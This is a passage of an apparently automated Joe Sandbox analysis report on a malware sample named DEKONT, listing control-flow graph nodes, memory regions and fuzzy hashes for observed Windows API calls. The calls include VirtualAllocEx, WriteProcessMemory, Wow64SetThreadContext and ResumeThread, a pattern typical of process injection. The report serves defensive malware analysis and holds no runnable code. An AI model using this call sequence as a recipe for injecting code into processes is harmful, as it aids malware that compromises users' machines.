                                                              control_flow_graph 186 5971ec5-5971f66 187 5971f7d-5971f88 186->187 188 5971f68-5971f7a 186->188 189 5971f9c-59720a4 CreateWindowExW 187->189 190 5971f8a-5971f99 187->190 188->187 193 59720a6-59720ac 189->193 194 59720ad-5972118 189->194 190->189 193->194 198 5972125 194->198 199 597211a-597211d 194->199 200 5972126 198->200 199->198 200->200
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05972091
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: b5cbc0a1bdc5c1f25fa81e913621824acf71beb3c5ffaf95324253c0e0c5f412
                                                              • Instruction ID: 8ca16e3b9bf4e1f830c4f7374830878b4f9793b63bf4667b2a8f2c5d05dd064c
                                                              • Opcode Fuzzy Hash: b5cbc0a1bdc5c1f25fa81e913621824acf71beb3c5ffaf95324253c0e0c5f412
                                                              • Instruction Fuzzy Hash: 287189B8D04218DFDF20CFA9D984BDDBBF1BB09300F5491AAE818A7221D7319A85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 201 5971ed0-5971f66 202 5971f7d-5971f88 201->202 203 5971f68-5971f7a 201->203 204 5971f9c-59720a4 CreateWindowExW 202->204 205 5971f8a-5971f99 202->205 203->202 208 59720a6-59720ac 204->208 209 59720ad-5972118 204->209 205->204 208->209 213 5972125 209->213 214 597211a-597211d 209->214 215 5972126 213->215 214->213 215->215
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05972091
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: f99eb730ab3af5bc7623daa2dcee40c3e7d78028144808c6e4f8cd7a8eea8bd1
                                                              • Instruction ID: 30fd41fc4388bc3df7ba084e834242aaeb27815a6cb68cb915b059d5394bb7e9
                                                              • Opcode Fuzzy Hash: f99eb730ab3af5bc7623daa2dcee40c3e7d78028144808c6e4f8cd7a8eea8bd1
                                                              • Instruction Fuzzy Hash: 44718AB4D04218DFDF20CFA9C984BDDBBF1BB09310F1091AAE818A7211D771AA85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 216 17f5e22-17f5e30 218 17f5e32-17f5efe 216->218 219 17f5e01-17f5e07 216->219 223 17f5f05-17f5f6c CreateActCtxA 218->223 225 17f5f6e-17f5f74 223->225 226 17f5f75-17f5ffa 223->226 225->226 235 17f5ffc-17f600c 226->235 236 17f6027-17f602f 226->236 239 17f6013-17f601f 235->239 240 17f6030 236->240 239->236 240->240
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 017F5F59
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: aad53335ee6cf25645549d88323358b0957d91239e4e876a19f056f3ba26c975
                                                              • Instruction ID: 76c50dfe0efe8b14f96b6983371da3007ef241d15ec96d76a830563a711d016a
                                                              • Opcode Fuzzy Hash: aad53335ee6cf25645549d88323358b0957d91239e4e876a19f056f3ba26c975
                                                              • Instruction Fuzzy Hash: CA512571904319CFEB11DFA4C884BCEBBF1AF4A704F10809AD549AB251DB315A89CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 241 17f3e44-17f5f6c CreateActCtxA 246 17f5f6e-17f5f74 241->246 247 17f5f75-17f5ffa 241->247 246->247 256 17f5ffc-17f601f 247->256 257 17f6027-17f602f 247->257 256->257 261 17f6030 257->261 261->261
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 017F5F59
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: e65906e71df04343d6e7212090946d54efd7102f0f2aa02fc7347cb8e11f0de9
                                                              • Instruction ID: 39769699b29f41de954a9fe4c64d3e411fe55e4d7ba502d7fdf3c45aaed2ae7c
                                                              • Opcode Fuzzy Hash: e65906e71df04343d6e7212090946d54efd7102f0f2aa02fc7347cb8e11f0de9
                                                              • Instruction Fuzzy Hash: 7051D371D00329CFDB20DFA5C880B9EBBF5AF49700F1080AAD549AB251DB716E89CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 262 17fa378-17fa380 264 17fa3ac 262->264 265 17fa382-17fa395 262->265 266 17fa397-17fb8fc 264->266 267 17fa3ae-17fa3f0 264->267 265->266 269 17fb8fe-17fb90d 266->269 270 17fb910-17fb962 LoadLibraryExW 266->270 269->270 272 17fb96b-17fb9a9 270->272 273 17fb964-17fb96a 270->273 273->272
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(?,?,?), ref: 017FB952
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 901aa8cceb0cb01a72d94d009f30c7cdef91770358295cb0b4d17dc72e02e8d6
                                                              • Instruction ID: b7d5e05a3cb5d67684add26abe4b420e86b463885502a7a0cbf4efa8d40ee99a
                                                              • Opcode Fuzzy Hash: 901aa8cceb0cb01a72d94d009f30c7cdef91770358295cb0b4d17dc72e02e8d6
                                                              • Instruction Fuzzy Hash: 5A41FEB5D00248CFCB10CFA9D488A9EFBF1FB49310F14806AEA58AB320D734A845CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 279 7abd7c8-7abd83b 281 7abd83d-7abd84f 279->281 282 7abd852-7abd8b3 WriteProcessMemory 279->282 281->282 284 7abd8bc-7abd90e 282->284 285 7abd8b5-7abd8bb 282->285 285->284
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD8A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 24fdf9c751c781bfe5097be9c4062295cf9d60112611509332c683f80d1af066
                                                              • Instruction ID: c069fe8aebf890aea7245da2d33495880f9888990daf07e9632fdb5ffdb67766
                                                              • Opcode Fuzzy Hash: 24fdf9c751c781bfe5097be9c4062295cf9d60112611509332c683f80d1af066
                                                              • Instruction Fuzzy Hash: 4141C9B5D012599FCF10CFA9D980AEEFBF1BB49310F24942AE828B7240D735AA45CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 290 7abd7d0-7abd83b 292 7abd83d-7abd84f 290->292 293 7abd852-7abd8b3 WriteProcessMemory 290->293 292->293 295 7abd8bc-7abd90e 293->295 296 7abd8b5-7abd8bb 293->296 296->295
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD8A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: dbbaf29c2941cc7a82347f0cba00566a81e3673110605befba033af09456d6f6
                                                              • Instruction ID: 6c0495240fb76f73df706fe69eb92ba8394d3bab273f6b0980dd8392006338a5
                                                              • Opcode Fuzzy Hash: dbbaf29c2941cc7a82347f0cba00566a81e3673110605befba033af09456d6f6
                                                              • Instruction Fuzzy Hash: 8141BAB4D012599FCF10CFA9D984ADEFBF1BB49310F14942AE818B7240D735AA45CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 17fb638-17fd7b3 DuplicateHandle 303 17fd7bc-17fd7fc 301->303 304 17fd7b5-17fd7bb 301->304 304->303
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017FD7A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 1629606bfc666216498196c6595fb9fd009322cec4cbf52c44c3a26b3e8e1d22
                                                              • Instruction ID: c5460013816b10366d41bbb4a2248a19476bb0d9344450661df2b499a6d52b22
                                                              • Opcode Fuzzy Hash: 1629606bfc666216498196c6595fb9fd009322cec4cbf52c44c3a26b3e8e1d22
                                                              • Instruction Fuzzy Hash: B74176B9D002589FCF10CFA9D884ADEFBF5BB19310F14906AE918AB310D335A955CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 308 17fd6d0-17fd6d2 309 17fd6d8-17fd7b3 DuplicateHandle 308->309 310 17fd7bc-17fd7fc 309->310 311 17fd7b5-17fd7bb 309->311 311->310
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017FD7A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 0b183381b803426a62638f9fd6cd2a7a303c21501beb80545a3f1629771661cd
                                                              • Instruction ID: 858311d4e0a912e7f35f0631d8a07836d13cfad4f4c5cd4a909eead75eb2be89
                                                              • Opcode Fuzzy Hash: 0b183381b803426a62638f9fd6cd2a7a303c21501beb80545a3f1629771661cd
                                                              • Instruction Fuzzy Hash: C84166B9D002589FCF10CFAAD984ADEFBF5BB49310F14906AE918AB310D335A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 315 7abd921-7abd9ea ReadProcessMemory 319 7abd9ec-7abd9f2 315->319 320 7abd9f3-7abda45 315->320 319->320
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 930255e3e7cf622603c0de67b15f6790186ff5623f11b11c3a8a65b09561e7c6
                                                              • Instruction ID: 629b72793e507d7041512adfe3e3e33697044600ce6794a3f00058161bf43041
                                                              • Opcode Fuzzy Hash: 930255e3e7cf622603c0de67b15f6790186ff5623f11b11c3a8a65b09561e7c6
                                                              • Instruction Fuzzy Hash: 7841B9B9D042599FCF10CFAAD880AEEFBB5BF59310F14942AE824B7200D735A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 325 7abd6a8-7abd76a VirtualAllocEx 329 7abd76c-7abd772 325->329 330 7abd773-7abd7bd 325->330 329->330
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ABD75A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0d81a5d89600e7c4e6bda3c02fb5e20fdd83cb8afe9b43022402fcc49a9b1512
                                                              • Instruction ID: 601792b5f77239b4cba99ea9442eaad58f1e93dcb22117345b14c4cf963ee1c1
                                                              • Opcode Fuzzy Hash: 0d81a5d89600e7c4e6bda3c02fb5e20fdd83cb8afe9b43022402fcc49a9b1512
                                                              • Instruction Fuzzy Hash: 944198B9D002599FCF10CFA9D884ADEFBB5BF49310F10942AE825BB210D735A945CF69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 335 7abd928-7abd9ea ReadProcessMemory 338 7abd9ec-7abd9f2 335->338 339 7abd9f3-7abda45 335->339 338->339
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ABD9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: efe93a64ec0b61ea5b486bc6933904b0afb63f1ccc27df00f9acec72841a5b39
                                                              • Instruction ID: b2a0e6c0e258361d749e603f9f0e4b04f79b29d33a08c83c55e7a40f4c0f998d
                                                              • Opcode Fuzzy Hash: efe93a64ec0b61ea5b486bc6933904b0afb63f1ccc27df00f9acec72841a5b39
                                                              • Instruction Fuzzy Hash: 5441A9B9D042599FCF10CFAAD880AEEFBB5BB49310F10942AE815B7240C735A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ABD75A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ed5d5ad29f391a0dc90e44452173173ba0eb3bbfb65eb458628d5cd03e2e00b4
                                                              • Instruction ID: 27c8143b722829648110e7ebc931061d10fcb5787039e633c93f71c99b161f78
                                                              • Opcode Fuzzy Hash: ed5d5ad29f391a0dc90e44452173173ba0eb3bbfb65eb458628d5cd03e2e00b4
                                                              • Instruction Fuzzy Hash: F63186B9E002599FCF10CFA9D884ADEFBB5BB49310F10942AE825B7210D735A945CF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 07ABD637
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5e4e85712ac099f8507a41e3724e82f513ea71d8ba45dd9620048aea43afacf1
                                                              • Instruction ID: edc1545c031e159ec19199b947ede627e777f1d9ca5e06af59aa954c3976064d
                                                              • Opcode Fuzzy Hash: 5e4e85712ac099f8507a41e3724e82f513ea71d8ba45dd9620048aea43afacf1
                                                              • Instruction Fuzzy Hash: 4F41CBB4D012599FDB10CFAAD884AEEFBF5BF49310F14842AE418B7240D739A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(?,?,?), ref: 017FB952
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 1ea69484773a194c1508873eff0267592e178e7b529c16b4bf9c6106287c0749
                                                              • Instruction ID: 8d179efb8479af21362154bed9d74438fcf385b86a45e96ec125712b205280bb
                                                              • Opcode Fuzzy Hash: 1ea69484773a194c1508873eff0267592e178e7b529c16b4bf9c6106287c0749
                                                              • Instruction Fuzzy Hash: C24198B8D00258DFCB10CFAAD884A9EFBF5BB49310F14906AE918B7320D335A945CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(?,?,?), ref: 017FB952
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 7f4fb104d08ad311b9b4efcb3be3734087cf4489cdec93cc57a5ce9a0a4a4e2b
                                                              • Instruction ID: 23261140fb61a8c1e7e4ca5dfa2d4827a63dd8a75c9807510091894efad03e20
                                                              • Opcode Fuzzy Hash: 7f4fb104d08ad311b9b4efcb3be3734087cf4489cdec93cc57a5ce9a0a4a4e2b
                                                              • Instruction Fuzzy Hash: A44198B9D00258DFCB10CFA9D484A9EFBF1BB49310F14906AE958B7310D335A945CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 07ABD637
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: c530c9e2aed1639c64e5e6fd5efbd18339bca46350ea2308f05e106bf16ca316
                                                              • Instruction ID: 9b8848c07761f1b0084d2350456212e3429235cf989bd165ed48e617b6113c49
                                                              • Opcode Fuzzy Hash: c530c9e2aed1639c64e5e6fd5efbd18339bca46350ea2308f05e106bf16ca316
                                                              • Instruction Fuzzy Hash: A931CBB4D012599FDB14DFAAD884AEEFBF5BF49310F14842AE418B7240C739A945CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05974701
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 46c7ad586e6d7fa936cc28dd3ef0223a42fdd9798d9a12a81444f9389e074b3a
                                                              • Instruction ID: 44adf87018b214a131b1f8becc1824230bd536a3245d95bd0bdccc73bd6379d7
                                                              • Opcode Fuzzy Hash: 46c7ad586e6d7fa936cc28dd3ef0223a42fdd9798d9a12a81444f9389e074b3a
                                                              • Instruction Fuzzy Hash: 594129B9900309CFDB14CF99C448AAAFBF5FB89314F248499E519AB321D774A841CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 032A05D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1373255583.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_32a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 686388b1bf8c1ae8effaf460e7e15c6930a1c19b75f06a39f163ad702932ebe8
                                                              • Instruction ID: a5145ec8ed1b5f845b0226cf0a1f7bab81bba3e45bf95c36c72850d9200b5745
                                                              • Opcode Fuzzy Hash: 686388b1bf8c1ae8effaf460e7e15c6930a1c19b75f06a39f163ad702932ebe8
                                                              • Instruction Fuzzy Hash: 7B3177B9D01258AFCB10CFA9D584ADEFBF1BB49310F24905AE818B7310D775A985CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 032A05D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1373255583.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_32a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 7ea4d21fb594befdee4dba22ade16eb0007501579cf43934424d8e149fd543c3
                                                              • Instruction ID: 481d869b4904743328e464aa05c11a55f8383b3996e6a8d4d0316fefcf7a58a1
                                                              • Opcode Fuzzy Hash: 7ea4d21fb594befdee4dba22ade16eb0007501579cf43934424d8e149fd543c3
                                                              • Instruction Fuzzy Hash: 7A3176B9D00258AFCB10CFA9D984ADEFBF5BB49310F24902AE818B7310D775A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(?), ref: 017FB22A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 536fb05104311e6d6dea443ef0fc96ba9699948b23e2bf544195cff5053eaae6
                                                              • Instruction ID: 785bda6512a51f97fd0be1b964c0598fb19b902181c022a1551bfa836bd295ca
                                                              • Opcode Fuzzy Hash: 536fb05104311e6d6dea443ef0fc96ba9699948b23e2bf544195cff5053eaae6
                                                              • Instruction Fuzzy Hash: D331AAB8D042499FCB14CFAAD484ADEFBF5BB48310F14906AE918B7320D335A945CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 07ABD516
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: ecd897fc7e059e4077070580c4afb094fcf38ba8a7c209bbbc61762c76ac9972
                                                              • Instruction ID: 223df707fc3f00f7e4ffb62859f094b56d62a69bdd964649c5900b1b8a8b35f1
                                                              • Opcode Fuzzy Hash: ecd897fc7e059e4077070580c4afb094fcf38ba8a7c209bbbc61762c76ac9972
                                                              • Instruction Fuzzy Hash: 3731B8B4D012199FCB24CFAAD885ADEFBB5AF49314F14842AE829B7200C735A941CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 07ABD516
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: f14026c8f258b933762aeb70a798e23d83cbc5b96b91bec6bd8903d47737ab95
                                                              • Instruction ID: cd6dcb85389479fcedc7cfdec85d868d2b687b0b6949ca5aee5c46b38d7b6f75
                                                              • Opcode Fuzzy Hash: f14026c8f258b933762aeb70a798e23d83cbc5b96b91bec6bd8903d47737ab95
                                                              • Instruction Fuzzy Hash: C631C9B4D012199FCB24CFAAD880ADEFBB4BB49314F10842AE829B7300C735A901CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 059A815B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: ba8a52cfdd33d6a713cab2aca567eb5e1dd1e3c5fb34236baeefcb946e8a0692
                                                              • Instruction ID: 1efc0941db0edae57019a29339352da0f7f4e6986800290f0d7d2f782ded3254
                                                              • Opcode Fuzzy Hash: ba8a52cfdd33d6a713cab2aca567eb5e1dd1e3c5fb34236baeefcb946e8a0692
                                                              • Instruction Fuzzy Hash: 6C31AAB5D002189FCB10DFA9D984ADEFBF4AB48320F14845AE815B7350D335AA45CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 059A815B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: 734777cef6eb43eaa6a42038e73a2110ac560ce79f76ae4dd6b835fc467e530b
                                                              • Instruction ID: 3978e9752e24759c5faaf5ec80eddfef98c3ebf614162dd961cf118da11931fc
                                                              • Opcode Fuzzy Hash: 734777cef6eb43eaa6a42038e73a2110ac560ce79f76ae4dd6b835fc467e530b
                                                              • Instruction Fuzzy Hash: 7A31AAB5D00218DFCB10CFA9D584ADEFBF4AB48320F14846AE815B7310D375AA45CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 059A815B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
